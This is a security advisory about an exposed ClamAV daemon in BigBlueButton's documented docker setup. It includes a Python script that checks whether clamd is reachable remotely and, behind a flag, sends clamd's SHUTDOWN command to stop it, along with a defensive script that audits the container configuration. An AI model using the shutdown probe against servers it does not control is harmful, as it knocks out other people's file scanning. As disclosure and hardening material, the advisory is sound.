BigBlueButton ClamAV Integration Denial-of-Service Vulnerability

Vulnerability

A denial-of-service vulnerability exists in BigBlueButton versions 3.0.21 and prior, due to an insecure ClamAV integration example. The official documentation allows ClamAV to be used as a scanner for uploaded presentation files, but the docker run example it provides publishes ClamAV's ports 3310 (clamd) and 7357 on all interfaces, exposing them to the internet. A remote attacker can then talk to the ClamAV daemon, clamd, directly: submitting large or complex documents exhausts CPU and memory on the server, and clamd's own control commands can be used to disrupt or stop the process. ClamAV's own documentation warns against binding clamd to anything other than localhost, and a host firewall does not help here: Docker manages its own iptables rules for published ports, so a firewall that filters the host's INPUT chain (such as ufw) does not cover them. Users who followed the ClamAV setup instructions from the BigBlueButton documentation are affected.

Impact

Exposing the ClamAV ports to the internet allows denial-of-service attacks against the BigBlueButton server: sending large or complex files to clamd can exhaust server resources, and clamd's control commands can stop the daemon outright, so presentation scanning is unavailable until clamd is restarted. Because the documented setup also mounts the BigBlueButton presentation directory into the container read-write and runs the container as root, a future vulnerability in clamd reachable over the exposed port could be used to read or manipulate files in that directory.

Reproduction

To reproduce this vulnerability, follow the ClamAV setup instructions in the BigBlueButton documentation for versions 3.0.21 and below. This runs ClamAV as a Docker container with the documented settings, which publish the ClamAV ports on all interfaces and so expose them to the internet. Once the ClamAV service is running, confirm from a remote host that port 3310 is reachable, then send clamd's SHUTDOWN command over that port using a tool such as netcat: clamd performs a clean exit and scanning stops until the container is restarted.
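The exchange described above, as an added example that is not part of the advisory or of BigBlueButton/ClamAV code. It speaks clamd's documented TCP command syntax (a command prefixed with "n" and terminated by a newline, so "nPING" is answered with "PONG") and uses it first to check whether clamd answers from the network at all, then, only when --shutdown is given, to send the SHUTDOWN command the reproduction relies on. The host argument, the port constant and the --shutdown flag are this script's own conventions.

```python
"""Probe a clamd TCP socket published by the documented ClamAV container.

Added example, not code from BigBlueButton or ClamAV. Assumes clamd's
newline-delimited command framing: b"n" + COMMAND + b"\\n".
"""
import socket
import sys

CLAMD_PORT = 3310  # the clamd port the documented docker example publishes


def encode_command(command: str) -> bytes:
    """Frame one clamd command in newline-delimited form ('n' prefix)."""
    if "\n" in command or "\0" in command:
        raise ValueError("command must not contain newline or NUL")
    return b"n" + command.encode("ascii") + b"\n"


def decode_reply(raw: bytes) -> str:
    """Strip clamd's terminator from a reply. An empty reply means clamd
    closed the connection without answering, which is what a SHUTDOWN
    looks like from the client side."""
    return raw.decode("ascii", errors="replace").strip("\n\0 ")


def clamd_command(host: str, command: str, port: int = CLAMD_PORT,
                  timeout: float = 5.0) -> str:
    """Open a TCP connection, send one command, return the reply text."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(encode_command(command))
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:            # peer closed (SHUTDOWN, or error)
                break
            chunks.append(chunk)
            if chunk.endswith(b"\n"):  # single-command replies end here
                break
    return decode_reply(b"".join(chunks))


def clamd_exposed(host: str, port: int = CLAMD_PORT) -> bool:
    """True if clamd answers PING on host:port from where this runs.
    Run it from a host other than the server: a PONG then proves the
    port is reachable over the network, not just from loopback."""
    try:
        return clamd_command(host, "PING", port) == "PONG"
    except (OSError, ValueError):
        return False


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    if not clamd_exposed(target):
        print(f"clamd not reachable on {target}:{CLAMD_PORT}")
        sys.exit(1)
    print("clamd reachable:", clamd_command(target, "VERSION"))
    if "--shutdown" in sys.argv:
        # The advisory's reproduction step: a clean SHUTDOWN sent from the
        # network stops clamd until something restarts the container.
        try:
            print("SHUTDOWN reply:", repr(clamd_command(target, "SHUTDOWN")))
        except OSError as exc:
            print("connection dropped during SHUTDOWN:", exc)
```

Run it against your own server from outside its network; a PONG on 3310 means the documented exposure is in place. The netcat equivalent of the shutdown step is a one-liner, but the script makes the reachability check explicit and keeps the destructive command behind a flag.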

Remediation

Users should update to BigBlueButton version 3.0.22 or later and follow the revised ClamAV setup instructions in the BigBlueButton documentation. The updated instructions bind the container's ports to localhost only, so that only BigBlueButton on the same host can reach clamd, mount the presentation volume read-only or not at all, and do not run the container as root. After applying these changes, configure the ClamAV container to restart automatically after a crash or a system reboot, since a clamd that has been stopped otherwise stays down. Existing deployments should verify the running container's actual configuration rather than only the command in the documentation.
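An added check for the four points above, not code from BigBlueButton or the ClamAV image: it reads the JSON that docker inspect prints for the ClamAV container and reports ports published on non-loopback addresses, writable mounts, a root container user and a missing restart policy. The field names are those of Docker's inspect output; the two sample inspect objects are constructed here to model the documented setup and a hardened one, and the mount path /var/bigbluebutton and the hardened docker run command in the comment are assumptions about the deployment rather than the documentation's exact text.

```python
"""Audit a ClamAV container's `docker inspect` output against the revised
setup guidance. Added example; field names follow Docker's inspect JSON.
Usage: docker inspect clamav | python3 audit_clamav.py
"""
import json
import sys

LOOPBACK = {"127.0.0.1", "::1"}

# Assumed hardened command (not the documentation's exact text):
#   docker run -d --name clamav --restart unless-stopped \
#     -p 127.0.0.1:3310:3310 \
#     -v /var/bigbluebutton:/var/bigbluebutton:ro \
#     clamav/clamav
# Whether --user can be set depends on the image; check the image's docs.


def audit_container(info: dict) -> list:
    """Return a list of findings; an empty list means all checks pass."""
    findings = []
    host_cfg = info.get("HostConfig") or {}

    # 1. Port bindings: an empty HostIp, 0.0.0.0 or :: means all interfaces.
    for port, targets in (host_cfg.get("PortBindings") or {}).items():
        for t in targets or []:
            host_ip = t.get("HostIp") or "0.0.0.0"
            if host_ip not in LOOPBACK:
                findings.append(
                    f"{port} published on {host_ip}:{t.get('HostPort')} "
                    "(not loopback)")

    # 2. Mounts: clamd only needs to read presentations; a writable mount
    #    hands any future clamd bug write access to that directory.
    for m in info.get("Mounts") or []:
        if m.get("RW", True):
            findings.append(f"mount {m.get('Destination')} is writable")

    # 3. User: empty means the image default, which is root unless the
    #    image sets USER; clamd may still drop privileges itself, so
    #    treat this as "verify", not proof (assumption noted in lead-in).
    user = (info.get("Config") or {}).get("User") or ""
    if user in ("", "root", "0") or user.startswith("0:"):
        findings.append(f"container user is {user or 'root (image default)'}")

    # 4. Restart policy, so a crashed or shut-down clamd comes back.
    policy = (host_cfg.get("RestartPolicy") or {}).get("Name") or "no"
    if policy == "no":
        findings.append("no restart policy (clamd stays down after a crash)")
    return findings


# Constructed sample: the shape of the setup the advisory describes.
DOCUMENTED_SETUP = {
    "Config": {"User": ""},
    "HostConfig": {
        "PortBindings": {
            "3310/tcp": [{"HostIp": "", "HostPort": "3310"}],
            "7357/tcp": [{"HostIp": "", "HostPort": "7357"}],
        },
        "RestartPolicy": {"Name": "no", "MaximumRetryCount": 0},
    },
    "Mounts": [{"Type": "bind", "Source": "/var/bigbluebutton",
                "Destination": "/var/bigbluebutton", "Mode": "", "RW": True}],
}

# Constructed sample: the same container after the revised instructions.
HARDENED_SETUP = {
    "Config": {"User": "clamav"},
    "HostConfig": {
        "PortBindings": {
            "3310/tcp": [{"HostIp": "127.0.0.1", "HostPort": "3310"}],
        },
        "RestartPolicy": {"Name": "unless-stopped", "MaximumRetryCount": 0},
    },
    "Mounts": [{"Type": "bind", "Source": "/var/bigbluebutton",
                "Destination": "/var/bigbluebutton", "Mode": "ro", "RW": False}],
}


def audit_inspect_output(text: str) -> list:
    """docker inspect prints a JSON list; audit every container in it."""
    return [f for info in json.loads(text) for f in audit_container(info)]


if __name__ == "__main__":
    source = sys.stdin.read() if not sys.stdin.isatty() else None
    results = (audit_inspect_output(source) if source
               else audit_container(DOCUMENTED_SETUP))
    for finding in results:
        print("FINDING:", finding)
    sys.exit(1 if results else 0)
```

Run it against the live container after the upgrade; with the documented setup it reports all five problems (two published ports, the writable mount, the root user and the missing restart policy), and the hardened sample produces no findings. A host firewall check is deliberately absent: Docker's published ports bypass ufw, so only the bindings themselves count.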

Added: Feb 21, 2026, 8:24 AM
Updated: Feb 21, 2026, 8:24 AM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 2.5
exploitability: 8.7
remediation: 0.0
relevance: 3.3
threat: 6.4
urgency: 2.9
incentive: 4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.